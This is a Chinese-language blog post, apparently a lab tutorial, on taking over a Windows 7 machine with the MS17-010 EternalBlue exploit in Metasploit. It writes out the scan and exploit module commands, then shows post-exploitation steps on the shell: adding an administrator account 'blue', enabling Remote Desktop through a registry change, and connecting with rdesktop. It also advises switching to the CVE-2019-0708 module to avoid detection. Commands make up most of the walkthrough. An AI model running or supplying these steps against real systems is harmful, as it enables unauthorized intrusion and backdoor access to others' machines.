User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   内网渗透   ›   正文
内网渗透

后渗透学习(三)

2020-01-14 12:06:05
42  0 0

利用ms17_010开启3389端口远程连接

攻击机kali

目标机win7 sp1(旗舰版)

当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块

use auxiliary/scanner/smb/smb_ms17_010 
设置目标IP或网段 
set RHOSTS 192.168.194.129
执行扫描  
run

利用ms17_010开启3389端口

这里可以看到可能存在,我们开始执行,得到shell,如果出现乱码的话执行chcp 65001

use exploit/windows/smb/ms17_010_eternalblue 
查看可设置的选项 
show options 
设置***目标ip 
set RHOST 192.168.194.129
执行攻击
exploit

利用ms17_010开启3389端口

然后我们创建用户名密码 blue/blue
net user blue blue /add
将用户blue添加入管理组 (不加入会连接不上)
net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题)
Kali远程桌面连接Win7
rdesktop 192.168.194.129:3389(不在msf中执行)

这里连接会在目标机器上得到提示,如果不管的话30秒后将默认选择确定断开

利用ms17_010开启3389端口

利用ms17_010开启3389端口

当点击确定的话,可以连接成功

利用ms17_010开启3389端口

如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接),复现要将win7升级的激活码,上网上随便找就行

补充一下,如果这两个漏洞复现不成功,可能是防火墙的原因,或者重启一下(嘻嘻)

至此复现成功

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • SUCTF 2019 Guess_game
  • Python pickle反序列化
  • [安洵杯 2019]easy_serialize_php
  • Session反序列化
  • 原生类序列化
近期评论
    文章归档
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 项目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    157 文章 0 评论 20305 浏览
    测试
    测试